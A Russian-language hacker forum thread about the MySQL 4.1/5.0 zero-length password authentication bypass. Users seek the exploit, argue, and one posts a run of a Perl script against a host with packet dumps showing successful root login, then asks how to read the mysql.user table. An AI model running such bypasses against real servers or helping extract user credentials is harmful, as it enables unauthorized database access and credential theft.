MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client
 

У кого есть эта штучка?
MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client

Автор r57 искал в нете везде битые ссылки.

MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client

Download

and

MySQL 4.1/5.0 zero-length password auth. bypass Exploit

Это локальный или удаленный?

use IO::Socket::INET;
А ты как думаешь?

2Ig-FoX
Удаленный.

Тоесть при его использувании я поднимаю права на сервере воще или только доступ к бд?
Єсли есть где описание подкинте плз!!!

Чувак с твоими знаниями ты нечего не поднимишь...
Описание найти можно самому.

Если ты поднимаешь права то с каких на какие??? :)

2[ cash ]
Просто не все родились такими умными как ты!!!
Да согласен я здесь чуток не внимательный!

НУ можно просто название прочитать сплойтов...

протестил сплойт на уязвимой машине

C:\>perl 1.pl root somehost.com 3306
Received greeting:
00000000 37 00 00 00 0A 34 2E 31 2E 31 34 2D 6E 74 00 22
00000010 00 00 00 56 5C 4B 41 44 73 38 5A 00 2C A2 08 02
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 65
00000030 64 44 65 52 49 57 5B 43 7D 6A 00

Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 72 6F 6F 74 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Received reply:
00000000 01 00 00 02 FE
Received OK reply, authentication successful!!

======

подскажите плиз как мне теперь зайти на уязвимый mysql и увидеть результат команды SELECT * FROM mysql.user WHERE user='root' ?????

дело в том что через стандартные mysql клиенты я не могу заместо паса нулевое значение подставить... а через сокет как в скрипте - я не знаю как сделать..